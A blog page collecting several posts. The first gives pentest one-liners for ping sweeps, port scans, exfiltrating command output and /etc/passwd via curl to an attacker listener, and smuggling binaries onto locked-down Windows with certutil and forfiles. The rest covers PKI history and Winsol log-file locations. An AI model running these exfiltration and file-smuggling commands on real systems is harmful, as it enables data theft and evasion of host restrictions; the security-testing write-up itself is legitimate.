Simple Ping Sweep, Port Scan, and Getting Output from Blind Remote Command Execution

Just dumping some quick and dirty one-liners! These are commands I have used to explore locked-down Windows and Linux machines, using bash or PowerShell when no other binaries were available or could easily be transferred to the boxes.

Trying to ping all hosts in a subnet

Linux

for i in $(seq 1 254); do host=192.168.0.$i; if timeout 0.1 ping -c 1 $host >/dev/null; then echo $host is alive; fi; done

Edit – a great improvement on this is the following, recommended by 0xdf:

for i in {1..254}; do (host=192.168.0.$i; if ping -c 1 $host > /dev/null; then echo $host alive; fi &); done

 

Windows – not the fastest, as Test-Connection has no timeout option:

powershell -c "1..254 | % {$h='192.168.0.'+$($_); if ($(Test-Connection -Count 1 $h -ErrorAction SilentlyContinue)) { $('host '+$h+' is alive')|Write-Host}}"
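A possible workaround – a sketch using the .NET Ping class, which does accept a timeout in milliseconds (100 ms here; same subnet and output as above):

powershell -c "$p=New-Object System.Net.NetworkInformation.Ping; 1..254 | % {$h='192.168.0.'+$($_); if ($p.Send($h,100).Status -eq 'Success') { $('host '+$h+' is alive')|Write-Host }}"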

Scanning open ports

Linux:

host=192.168.0.1; for port in {1..1000}; do timeout 0.1 bash -c "echo >/dev/tcp/$host/$port && echo port $port is open"; done 2>/dev/null

… or if nc is available:

for port in $(seq 1 1000); do timeout 0.1 nc -zv 192.168.0.1 $port 2>&1 | grep succeeded; done

Windows – not using Test-NetConnection in order to control the timeout:

powershell -c "$s=$('192.168.0.1');1..1000 | % {$c=New-Object System.Net.Sockets.TcpClient;$c.BeginConnect($s,$_,$null,$null)|Out-Null;Start-Sleep -milli 100; if ($c.Connected) {$('port '+$_+' is open')|Write-Host }}"

Getting output back

… if all you can do is run a command blindly, and if there is an open outbound port. In the examples below 192.168.6.6 is the attacker’s host – on which you would start a listener like:

nc -lvp 80

Linux

curl -d $(whoami) 192.168.6.6
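Quoting the command substitution keeps whitespace in the output intact, and a whole file can be sent with curl’s --data-binary option – for example:

curl -d "$(uname -a)" 192.168.6.6

curl --data-binary @/etc/passwd 192.168.6.6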

Windows

powershell -c curl 192.168.6.6 -method POST -body $(whoami)

Echo Unreadable Hex Characters in Windows: forfiles

How to transfer small files to a locked-down Windows machine? When there is no option to copy, ftp, or HTTP GET a file? When PowerShell is blocked, so that you can only use Windows cmd commands?

My first choice would be to use certutil: certutil is a built-in tool for certificate and PKI management. It can encode binary certificate files – resulting in the familiar PEM output, starting with “-----BEGIN CERTIFICATE-----”. But it can actually encode any binary file! So you can ‘convert’ an executable to a certificate encoded in readable characters, and copy the fake PEM certificate by echo-ing out each of its lines on the target machine. Then the original executable is recovered by decoding the file again with certutil.
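A minimal sketch of that round trip (the file names are just examples):

certutil -encode putty.exe putty.pem

… then echo out the base64 lines of putty.pem on the target, and recover the binary with:

certutil -decode putty.pem putty.exe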

But what if certutil is also blocked, and you need to write / paste unreadable characters?

On Linux, you could run

echo -e "\x41"

A

But Windows echo does not have an option to translate characters encoded in hex automatically.

The command line tool forfiles allows you to do this, albeit in a somewhat convoluted way:

forfiles processes files in a directory and interprets the files’ metadata. The examples in the help information give an overview of what the tool is typically used for:

forfiles /?

FORFILES /P C:\WINDOWS /S /M DNS*.*
FORFILES /S /M *.txt /C "cmd /c type @file | more"
FORFILES /P C:\ /S /M *.bat
FORFILES /D -30 /M *.exe
/C "cmd /c echo @path 0x09 was changed 30 days ago"
FORFILES /D 01.01.2001
/C "cmd /c echo @fname is new since Jan 1st 2001"
FORFILES /D +8.5.2019 /C "cmd /c echo @fname is new today"
FORFILES /M *.exe /D +1
FORFILES /S /M *.doc /C "cmd /c echo @fsize"
FORFILES /M *.txt /C "cmd /c if @isdir==FALSE notepad.exe @file"

For each file in a filtered set a command can be executed with option /C. The interesting example is the one referring to

echo @path 0x09

The help explains:

To include special characters in the command
line, use the hexadecimal code for the character
in 0xHH format (ex. 0x09 for tab). Internal
CMD.exe commands should be preceded with
"cmd /c".

You want to run the command exactly once, and forfiles executes it once per matched file. Thus create an empty directory, cd to it, and create a single dummy file within it:

C:\test>echo test >test.txt

Then run echo [hex string] for that single file, like this. It outputs the interpreted characters corresponding to the hexadecimal values:

C:\test>forfiles /c "cmd /c echo 0x410x420x430x01"

ABC☺

C:\test>

Remaining issue: Newlines are added before and after the string. Especially the one at the beginning could be problematic if the operating system expects the magic bytes of a certain file type right at the start.

The first newline is removed by redirecting echo within the enclosed command (whereas redirecting the whole forfiles command would keep it):

C:\test>forfiles /c "cmd /c echo 0x410x420x430x01 >out.txt"

C:\test>type out.txt
ABC☺

C:\test>

The trailing extra line is a superfluous carriage return + linefeed. It can be removed by using the set command in this way:

set /p=[String]

This uses the set /p command, which prompts for user input: the string after the equals sign is displayed as the prompt text – without an appended line break. Since no variable name is specified, the command fails and sets the error level to 1, but the prompt is printed anyway.

C:\test>forfiles /c "cmd /c set /p=0x410x420x430x01 >out.txt"


C:\test>type out.txt
ABC☺

This command seems to ‘hang’, and you need to press ENTER once more to complete it. cmd is waiting for input here; you can feed it input from the nul device – then the command completes in one step:

C:\test>forfiles /c "cmd /c <nul set /p=0x410x420x430x01 >out.txt"

But there is still a blank character (decimal 32) appended at the end:

C:\test>powershell Get-Content out.txt -encoding Byte
65
66
67
1
32

This blank goes away if no blank is entered between the hex string and the >:

C:\test>forfiles /c "cmd /c <nul set /p=0x410x420x430x01>out.txt"


C:\test>powershell Get-Content out.txt -encoding Byte
65
66
67
1

Remaining limitation: The string must not begin with special characters that trip up the set command. For example, an equals sign at the beginning is a bad character (and it does not matter whether this character is hex-encoded or not).
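Putting it all together: a file larger than a single command line can be written in chunks – create it with > and append with >>. A sketch, with the hex values just an example:

C:\test>forfiles /c "cmd /c <nul set /p=0x410x42>out.bin"

C:\test>forfiles /c "cmd /c <nul set /p=0x430x44>>out.bin"

C:\test>powershell Get-Content out.bin -encoding Byte
65
66
67
68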

Certificates and PKI. The Prequel.

Some public key infrastructures have been running quietly in the background for years. They are half forgotten until the life of a signed file comes to an end – but then everything is on fire. In contrast to other seemingly important deadlines (Management needs this by XY or the world will come to an end!) this deadline really can’t be extended. The time of death has been included in the signed data all along.

The entire security ‘ecosystem’ changes while these systems sleep in the background. Now we have Let’s Encrypt (I was late to that party), HTTPS is everywhere, and the green padlock as an indicator of a secure site is about to die.

Recently I stumbled upon a whirlwind tour of the history of PKI and SSL/TLS – covering important events in the evolution of standards and technologies, from shipping SSLv2 in Netscape Navigator 1.1 in 1995 to Chrome marking HTTP pages as ‘not secure’ in 2018. Scrolling down the list of years I could not avoid waxing nostalgic. I have written about PKI at length before, but this time I do what the Hollywood directors of blockbusters do – I write a prequel.

I remember the first times I created a Certificate Signing Request (CSR) and submitted it to a Certificate Authority (CA). It was well before 2000, and it was an adventure!

I was a scientist turned freelance IT consultant – I went from looking at Transmission Electron Microscope images to troubleshooting why Outlook did not start on small business owners’ computers. And I was daring enough to give trainings, based on the little I knew (with hindsight) about IT and networking. I also developed some classes from scratch – creating wiki-style training material, using Microsoft FrontPage 1998.

One class was called networking and security or the like, and it was part of a vocational retraining curriculum – to turn former factory workers and admin assistants into computer technicians. For reasons I cannot remember I included a brief explanation of the RSA algorithm in my clunky FrontPage site. It was maybe a pretext to justify an exciting lab exercise: As the PKI history timeline shows, SSL was still rather new. Press releases by Austrian IT companies highlighted the military-grade protection from eavesdropping. It felt like Star Trek. One of the early Austrian national CAs offered ‘light’ test certificates. The description of the enrollment process was targeted at business users, but it was pure geek speak: A mysterious multi-step procedure explained in hacker terms like Secure Vault.

I don’t remember if my students found it that exciting, or if the test – enrolling for lots of certificates simultaneously – worked all that well. But I was hooked.

As a freelancer I started working with my former colleagues again – supporting the scientists in subverting, er, re-interpreting the central IT department’s policies by setting up their own server, or in circumventing the firewall by dialing in to their own modem. These were the days of IT hype in the late 1990s, before the dotcom bust. The research center had a new CEO with an IT background, and to get your projects approved you had to tack the label virtual onto anything. So I helped with creating a Virtual Materials Science Lab – which meant we used Microsoft NetMeeting.

Despite or because of such activities I also started working for the IT department. It was the time when The Cluetrain Manifesto told us that hyperlinks were subversive. As a ‘manager’ I should have disciplined shadow IT admins purchasing their own domains and running their shadow servers, but I could not stop tinkering with the web servers myself. It was also the time when I learned that to make things work in larger organizations – or a combination of several of those – you often need to social engineer someone.

We needed an SSL certificate – and I was the super qualified person for that task, based on my experience playing with the Secure Vault. But creating and submitting the CSR, and installing the certificate was the easy part. There were unexpected challenges:

The research center had a long legal name – 65 characters including the final dot in the indication of the legal entity. Common Names in X.509 certificates are limited to 64 characters, so I could not enter the final dot in IIS’s (Internet Information Server’s) wizard for CSRs. The legal name was cross-checked against the Dun&Bradstreet database. One would think that the first 64 characters of a peculiar German name would have been sufficient, but no. It took several phone calls – and faxes! – to prove to the US-based CA company that we were who we claimed to be.

The fact that I called a CA company in the US might highlight a mistake: If I recall correctly, Big CA had partners in Europe at that time already, but I missed that – or I wanted to talk to the mothership for some reason.

To purchase the certificate from the US-based company you needed a credit card, to be entered exactly when you submit the CSR. This process disrupted the usual purchasing procedures, and I had to social engineer somebody from the procurement department to join me in my adventure, bringing the corporate credit card.

The research center was a company owned 51% by government – so you had SAP and insane management deadlines as well as conferences and academic publication records. The Internet in general was still dominated by its academic roots. Not long ago, there had been a single web page listing All WWW servers in Austria, and that page was run by the academic internet backbone. Domain registration data were tied to a person, to the wrong person, or to the wrong entity – which came back to bite you later.

Fortunately the domain assigned to the SSL certificate belonged to us – so I did not have to social engineer a DNS admin this time. But it was assigned to a person and not to the organization. The person was an employee in charge of the network, but how should you prove that? More faxes and phone calls were required to sort out the fine legal points.

I did not keep records of that period, so I don’t know if this web server is alive or if at least the domain still exists. Unlikely, perhaps, given the rapid decay of rotting links. But while researching history for this post – randomly googling for early versions of Microsoft’s web servers – I discovered interesting things. There is a small chance it may be alive!

The first version of the Windows Certificate Authority had been released as an add-on to Windows NT 4, as part of the so-called Windows NT 4 Option Pack – the same add-on that also contained the webserver (IIS) itself. It was the time when I learned ASP programming by going online via dial-up and browsing through MSDN as quickly as possible so as not to overspend my precious monthly online time.

I wanted to relive the setup of Internet Information Server 4.0 and the Option Pack – and found lots of support articles and how-to’s, like this one.

However, I also found live websites like this:

This is only the setup CD, so no danger yet, but you can also find sites with the welcome page of the operating web server online – including sample ASP applications – which I deliberately don’t show. (Image credits: Microsoft.)

I wonder why I had been frantically re-developing my websites in ASP.NET from scratch – ‘just because’ ASP was outdated technology, even though there were no known vulnerabilities and the sites were running on a modern operating system.

Time to quote from Peter Gutmann’s book Engineering Security:

A great many of today’s security technologies are “secure” only because no-one has ever bothered attacking them.

… which is also true for yesterday’s technology still online!

Where Are the Files? [Winsol – UVR16x2]

Recently somebody asked me where the log files are stored. This question is more interesting than it seems.

We are using the freely programmable controller UVR16x2 (and its predecessor, UVR1611) …

… and their Control and Monitoring Interface – CMI:

The CMI is a data logger and runs a web server. It logs data from the controllers (and other devices) via CAN bus – I have demonstrated this in a contrived example recently, and described the whole setup in this older post.

IT / smart home nerds have asked me why there are two ‘boxes’, as other solutions use only a ‘single box’ as both controller and logger. I believe separating these functions is safer and more secure: A logger / web server should not be vital to running the controller, and any issues with these auxiliary components must not impact the controller’s core functions.

Log files are stored on the CMI in a proprietary format, and they can be retrieved via HTTP using the software Winsol. Winsol lets you visualize data for one or more days, zoom in, define views etc. – and data can be exported as CSV files. This is the tool we use for reverse engineering hydraulics and control logic (German blog post about remote hydraulics surgery):

In the latest versions of Winsol, log files are by default stored in the user’s profile on Windows:
C:\Users\[Username]\Documents\Technische Alternative\Winsol

I had never paid much attention to this; I had always changed that path in the configuration to make backup and automation easier. The current question about the log files’ location was actually about how I managed to make different users work with the same log files.

The answer might not be obvious because of the historical location of the log files:

Until some version of Winsol in use in 2017, log files were stored in the Program Files folder – or at least Winsol tried to use that folder. Windows does not allow this anymore, for security reasons.

If Winsol is upgraded from an older version, settings might be preserved. I did my tests with Winsol 2.07 upgraded from an earlier version. I am a bit vague about versions, as I did not test different upgrade paths in detail. My point is: users of control system software tend to be conservative when it comes to changing a running system – an older ‘logging PC’ with an older or upgraded version of Winsol is not an unlikely setup.

I started debugging on Windows 10 with the new security feature Controlled Folder Access enabled. CFA, of course, did not know Winsol and considered it an unfriendly app … which had to be white-listed.

Then I was curious about the default log file folders, and I saw this:

In the Winsol file picker dialogue (to the right) the log folders seem to be in the Program Files folder:
C:\Program Files\Technische Alternative\Winsol\LogX
But in Windows Explorer (to the left) there are no log files at that location.

What does Microsoft Sysinternals Process Monitor say?

There is a Reparse Point, and the file access is redirected to the folder:
C:\Users\[User]\AppData\Local\VirtualStore\Program Files\Technische Alternative\Winsol
Selecting this folder directly in Windows Explorer shows the missing files:

This location can be re-configured in Winsol to allow different users to access the same files (Disclaimer: Perhaps unsupported by the vendor…)

And there are also some truly user-specific configuration files in the user’s profile, in
C:\Users\[User]\AppData\Roaming\Technische Alternative\Winsol

Winsol.xml stores, for example, the list of ‘clients’ (logging profiles) that are included in automated processing of log files, and cookie.txt is the logon cookie for access to the online logging portal provided by Technische Alternative. If you absolutely want to switch Windows users *and* switch logging profiles often *and* sync those, you have to tinker with Winsol.xml, e.g. by editing it using a script like the sketch below (Disclaimer again: Unlikely to be a supported way of doing things ;-))
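Such a script could be a few lines of PowerShell – a sketch only; the root element and the DataPath node are made-up names for illustration, as the actual structure of Winsol.xml may differ between versions:

$path = "$env:APPDATA\Technische Alternative\Winsol\Winsol.xml"
[xml]$cfg = Get-Content -Raw $path
# 'Winsol' / 'DataPath' are hypothetical node names - check your Winsol.xml for the actual elements
$cfg.Winsol.DataPath = 'D:\WinsolData'
$cfg.Save($path)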

To summarize, these are the steps required to migrate Winsol’s configuration to a new PC and prepare it for usage by different users (a copy-command sketch follows the list):

  • Install the latest version of Winsol on the target PC.
  • If you use Controlled Folder Access on Windows 10: Exempt Winsol as a friendly app.
  • Copy the contents of C:\Users\[User]\AppData\Roaming\Technische Alternative\Winsol from the user’s profile on the old machine to the new machine (user-specific config files).
  • If the log file folder shows up at a different path on the two machines – for example when using the same folder via a network share – edit the path in Winsol.xml or configure it in General Settings in Winsol.
  • Copy your existing log data to this new path. LogX contains the main log files, Infosol contains clients’ data. The logging configuration for each client, e.g. the IP address or portal name of the logger, is included in the setup.xml file in the root of each client’s folder.
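For the copy steps, robocopy does the job – a sketch; the old machine’s name and the user name are placeholders:

robocopy "\\OLD-PC\c$\Users\alice\AppData\Roaming\Technische Alternative\Winsol" "%APPDATA%\Technische Alternative\Winsol" /E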

Note: If you skip some Winsol versions when migrating/upgrading, the structure of the files might have changed – be careful! The last time that happened was at the end of 2016, and Data Kraken had to re-configure some tentacles.